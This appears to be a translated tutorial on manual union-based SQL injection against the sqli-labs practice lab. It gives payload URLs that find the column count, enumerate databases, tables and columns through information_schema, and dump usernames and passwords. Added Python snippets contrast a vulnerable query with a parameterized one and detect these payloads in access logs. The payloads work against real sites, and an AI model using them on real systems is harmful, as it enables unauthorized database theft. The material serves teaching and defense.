Objective
This article describes one of the most basic procedures for manual SQL injection. If you have worked through the earlier sqli-labs experiments and understand all the knowledge points there, you can dump a database (the original slang is "taking off its pants") with the steps below. These steps are also the basis for the other dumping methods, so if you want to be proficient in SQL injection, this most basic procedure must be understood and mastered.
For convenience, we again use the numeric injection point from the previous article as the example.
Get the total number of fields
In the previous introduction we already established that in http://localhost/sqlilabs/Less-2/?id=1 the id parameter is an injection point.
The SQL statement in the backend is written roughly as:
Select username,password,[...] from table where id=userinput
We then use an order by clause to determine how many fields the select queries.
The payload becomes (trying 1, 2, 3, 4 ... in turn):
http://localhost/sqlilabs/Less-2/?id=1 ORDER by 1/2/3/4 ....
When order by 4 makes the program error, the select has 3 fields in total.
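As an added illustration (not code from the original article or from sqli-labs, which is PHP on MySQL), the following Python snippet uses an in-memory sqlite3 database to show why the order by probe above tells the attacker anything at all: the backend splices the raw id into the query text, exactly like the "where id=userinput" statement quoted above. The vulnerable lookup is placed beside a hardened one that checks the parameter is an integer and binds it instead of concatenating it. The table, its rows and the function names are constructed for this example.

```python
import re
import sqlite3


# Constructed stand-in for the lab database (assumption: a users table with the
# three columns id, username, password, as the walkthrough later enumerates).
# The rows are made up for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "s3cret"), (2, "bob", "hunter2")],
    )
    return conn


def lookup_vulnerable(conn, user_input):
    """Mirror of the page's 'where id=userinput': the raw parameter is spliced
    into the SQL text, so anything after the number is parsed as SQL."""
    sql = "SELECT id, username, password FROM users WHERE id=" + user_input
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, user_input):
    """Validate the type the application expects (an integer id), then bind it
    as a parameter so the database driver never interprets it as SQL."""
    if re.fullmatch(r"-?[0-9]+", user_input) is None:
        raise ValueError("id must be an integer")
    sql = "SELECT id, username, password FROM users WHERE id=?"
    return conn.execute(sql, (int(user_input),)).fetchall()


def run_lookup(conn, lookup, user_input):
    """Run one lookup and report ('rows', rows) or ('error', exception name),
    so the two implementations can be compared on the same input."""
    try:
        return ("rows", lookup(conn, user_input))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1 ORDER BY 3", "1 ORDER BY 4"):
        print(
            probe.ljust(14),
            "vulnerable:", run_lookup(db, lookup_vulnerable, probe),
            "| hardened:", run_lookup(db, lookup_hardened, probe),
        )
```

Against the vulnerable lookup, "1 ORDER BY 3" returns the row while "1 ORDER BY 4" raises an OperationalError from the database, which is the signal the walkthrough relies on; the hardened lookup rejects both probes with a ValueError before any SQL runs, so the column count is never leaked.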
Get the display positions
Only some of the fields the select retrieves are shown on the page, so the next step is to determine which of them are displayed.
Use either of the following payloads to judge:
http://localhost/sqlilabs/Less-2/?id=-1 Union Select 1,2,3
http://localhost/sqlilabs/Less-2/?id=1 and 1=2 Union Select 1,2,3
When you use the payloads above, the page appears as follows:
As you can see from the page above, the 2nd and 3rd fields are displayed.
Query the database names
Once we know the display positions, we can use them to show the information we want, such as the database version and user information. The following payload retrieves that information:
http://localhost/sqlilabs/Less-2/?id=-1 Union Select 1,version (), Database ()
The page then displays:
You can see that the database version and the name of the database currently in use appear on the page.
Next, we can obtain the names of all databases on the server in the same way.
The payload is as follows:
http://localhost/sqlilabs/Less-2/?id=-1 Union Select 1,2,schema_name from information_schema.schemata limit 0,1 # returns the first database name
http://localhost/sqlilabs/Less-2/?id=-1 Union Select 1,2,schema_name from information_schema.schemata limit 1,1 # returns the second database name
...
Query the table names
Since database() returns the database used by the current web program, we use database() to query all of its table information. From the previous step we already know that the current database is security.
We then construct the payload as follows:
http://localhost/sqlilabs/Less-2/?id=-1 Union SELECT 1,GROUP_CONCAT (TABLE_NAME), 3 from Information_schema.tables where Table_schema=database ()
This gives us all the table names in the current database. The page returns:
So we know that there are 4 tables in the current database: emails, referers, uagents and users.
Query the column names
Knowing the table name, we can use information_schema.columns together with that table name to get all the fields of the table.
The payload is as follows:
http://localhost/sqlilabs/Less-2/?id=-1 Union Select 1,group_concat (column_name), 3 from Information_schema.columns Where table_name= ' users '
http://localhost/sqlilabs/Less-2/?id=-1 Union select 1,group_concat (column_name), 3 From Information_schema.columns where table_name=0x7573657273 (0x7573657273 is "users" in hexadecimal)
The page displays the following result:
With this statement we learn that these fields exist in the users table: USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS, id, username, password, id, name, password. But when I tested this locally there was a problem: the users table in the security database actually has only 3 fields, id, username and password; the other fields are column names of users tables in other databases.
With the payload above we can likewise learn the field names of emails, referers and uagents.
But sometimes the backend code filters the query so that the column names cannot be fetched from information_schema.columns. In that case one can only guess the column names based on experience. Guessing is fairly simple: an exists clause can be used to test a guess. Suppose we already know the table name (the table name can of course also be found with an exists clause).
The guessing statement is:
http://localhost/sqlilabs/Less-2/?id=1 and exists (select uname from users)
The key pattern is exists(select <column name to guess> from users). If the guessed column name (here uname) does not exist in the users table, the page shows no content or directly shows a SQL error statement.
As shown below:
Next, guess a field that does exist in the users table:
http://localhost/sqlilabs/Less-2/?id=1 and exists (select username from users)
Guessing that the users table has a username column, the statement above returns results normally, so the users table does indeed contain a column named username.
Dump the data
Once we know all the table names and field names of the current database, we can dump all of its data. For example, to download all the data in the current users table, use the following payload:
http://localhost/sqlilabs/Less-2/?id=-1 Union Select 1,group_concat (Username,password), 3 from users
This retrieves all the username and password data from the users table; data from other tables can be obtained in the same way.
Summary
The above is a complete example of SQL injection. Has everyone learned it? We will continue to publish articles on SQL injection, so please keep following the cloud-dwelling community.
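Every step of the procedure above leaves a recognisable trace in the web server's access log: an order by probe, a union select with numeric placeholders, references to information_schema, and exists(select ...) guesses. The following Python snippet is an added example (not part of the original article) that scans combined-format log lines for exactly those stages and groups the hits per client, so a defender can spot a client walking through the whole enumeration sequence. The log lines are constructed for this example and replay the walkthrough's payloads against a made-up host; the rule names and helper functions are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). Lines 2-6 replay the
# probe sequence from the walkthrough; the others are benign requests, the last
# one containing "order=by_date" as a near-miss for the ORDER BY rule.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqlilabs/Less-2/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqlilabs/Less-2/?id=1%20ORDER%20BY%204 HTTP/1.1" 200 301
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqlilabs/Less-2/?id=-1%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 520
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sqlilabs/Less-2/?id=-1%20UNION%20SELECT%201,2,schema_name%20from%20information_schema.schemata%20limit%200,1 HTTP/1.1" 200 530
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /sqlilabs/Less-2/?id=1%20and%20exists(select%20uname%20from%20users) HTTP/1.1" 200 300
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /sqlilabs/Less-2/?id=1%20and%20exists(select%20username%20from%20users) HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /sqlilabs/Less-2/?id=2 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:08 +0000] "GET /index.php?order=by_date HTTP/1.1" 200 900
"""

# Apache/nginx combined log format: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)

# Each rule targets one stage of the enumeration the walkthrough performs.
RULES = [
    ("order-by probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\s*\.", re.I)),
    ("exists-guess", re.compile(r"\bexists\s*\(\s*select\b", re.I)),
]


def decode_query(path):
    """Return the query string of a request path, URL-decoded repeatedly (at
    most 3 rounds) so double-encoded payloads are normalised as well.
    Comment-based obfuscation such as /**/ is not handled here."""
    query = path.split("?", 1)[1] if "?" in path else ""
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query


def analyze(log_text):
    """Scan combined-format log lines and return one finding per line that
    matches at least one rule, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = decode_query(m.group("path"))
        hits = [name for name, rx in RULES if rx.search(query)]
        if hits:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "path": m.group("path"), "query": query, "hits": hits})
    return findings


def summarize_by_ip(findings):
    """Map each source IP to the sorted list of rule names it triggered; a
    client that covers several stages is walking the enumeration sequence."""
    summary = {}
    for f in findings:
        summary.setdefault(f["ip"], set()).update(f["hits"])
    return {ip: sorted(names) for ip, names in summary.items()}


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["ip"], f["ts"], ", ".join(f["hits"]), "<-", f["query"])
    print(summarize_by_ip(analyze(SAMPLE_LOG)))
```

On the sample above, five of the eight lines are flagged and all of them come from 10.0.0.5, which trips every rule; the benign "order=by_date" request is not matched because the rule requires whitespace between order and by, as in a real clause. Per-client grouping is what turns individual regex hits into the more meaningful signal "this client enumerated column count, then schema, then guessed columns".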